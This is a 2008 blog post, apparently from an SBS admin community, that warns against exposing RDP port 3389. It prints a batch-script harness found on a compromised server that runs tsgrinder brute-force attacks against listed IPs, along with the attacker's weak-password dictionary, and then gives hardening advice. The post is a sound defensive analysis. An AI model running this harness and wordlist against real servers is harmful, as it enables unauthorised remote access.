Monday, June 23, 2008 7:00 PM
bradley
Unfettered access to port 3389
I'm reading this post and it's talking about how to run the wizard for VPN but at the end, is it just me or does it suddenly change over to using straight RDP to the server?
Configure Windows Small Business Server 2003 R2 Remote Access | Tech of all Trades | TechRepublic.com:
http://blogs.techrepublic.com.com/techofalltrades/?p=158
Here's why unfettered access to port 3389 is a bad thing.
(Keep in mind that when I show you this, by the time this software was placed on the server, the initial intrusion had already occurred (full investigation still pending on that), and I had already shut off key elements of the site/servers ensuing that the bad software was limited. Thus the only reason why the box was still running was to get log files off the system. [and yes, that it was the reason why it was offline for 4 days was to arrange to keep the log files and evidence for later review].
With that said...this, is why you don't want unfettered access to RDP.
On the c:\recycler\T folder on the server was several files. The file of Startscan.bat which launched a command window.
(Apologies for the swear words)
The code looks like this:
@echo off
echo +-----------------------------------------------+
echo ¦ Terminal Service Auto Hacker ¦
echo ¦ Coded by OscarHS ¦
echo ¦-----------------------------------------------¦
echo ¦ Copyright © 2006 Natural Alliance ¦
echo ¦ ¦
echo +-----------------------------------------------+
echo.
echo.
echo Lets own some sh_t!...
@echo off
for /f "eol=; tokens=1*" %%i in (scan.txt) do call scan.bat %%i
echo Exploiting done...
pause
In the file Scan.bat the contents were as follows:
@echo off
echo "#################################" >> results.txt
echo %1 >> results.txt
tsgrinder.exe -n 2 %1 >> results.txt
echo "#################################" >> results.txt
For those of you unaware of what TSgrinder.exe is, it's a brute force Terminal Server attack tool.
In the Scan.txt file was a list of IP addresses.
Finally in a file called dict was the following:
let!yoda!in!
administrator
passwd
123456
12345678
123456789
111111
11111111
000000
88888888
123123
666666
00000000
1234567
888888
admin
asdf
asdfgh
root
server
1
111
123
1234
654321
!@#$
!@#$%
!@#$%^
!@#$%^&
!@#$%^&*
abc
abc123
password
pass
So let's analyze what this was trying/intending to do. Drop on the box, run a script to brute force rdp ports and while at it use some preconfigured passwords.
Now there are several arguments to overcoming brute force attacks like this.
1. Change the port to something other than port 3389.
Pro: Some folks argue that alternative ports mean that you will be left out of automated attacks.
Con: RDP traffic still can be sniffed. Ensure that you are not getting a false sense of security.
2. Ensure that the port is blocked or protected.
Pro: Using items such as www.authanvil.com Two factor authentication for the secure solution, to VPN to fire up first, to at least ensuring the firewall only allows RDP from certain specific RDP ports ensures that you can limit exposure as well as limit the log file review/attention that you have to do.
Con: May not have a static IP, VPN ports may be blocked, and must have keyfob at all times.
But seriously after look at that tool by Oscar... do you want to be a bit more protected from that?
So ensure that port a tad bit protected.
Filed under: Security
![[There's a reason that Yoda is the unofficial mascot of SBS. Size indeed matters not.]](http://www.sbslinks.com/images/headertop.png "There's a reason that Yoda is the unofficial mascot of SBS. Size indeed matters not!")